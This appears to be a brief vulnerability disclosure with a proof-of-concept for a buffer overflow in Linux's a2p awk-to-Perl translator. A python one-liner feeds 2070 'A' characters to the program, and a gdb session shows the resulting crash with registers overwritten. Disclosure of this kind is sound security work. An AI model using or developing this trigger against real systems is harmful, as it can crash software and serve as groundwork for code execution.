Linux Awk To Perl Translator Buffer Overflow

Linux Awk to Perl (/usr/bin/a2p) suffers from a buffer overflow vulnerability.


MD5 | 5f941b7a5f120e4ea63ce6593fdf699a

#
#
# Linux Awk to Perl translator `/usr/bin/a2p` Buffer Overflow (PoC)
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
#
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
#
# Use them at your own risk!
#
#

[[email protected] ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[[email protected] ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax 0x1060 4192
ecx 0x1 1
edx 0x41414141 1094795585
ebx 0x880ff4 8916980
esp 0xbffff0f0 0xbffff0f0
ebp 0xbffff118 0xbffff118
esi 0x41414141 1094795585
edi 0x8062920 134621472
eip 0x74ee65 0x74ee65 <fgets+53>
eflags 0x210216 [ PF AF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)


Related Posts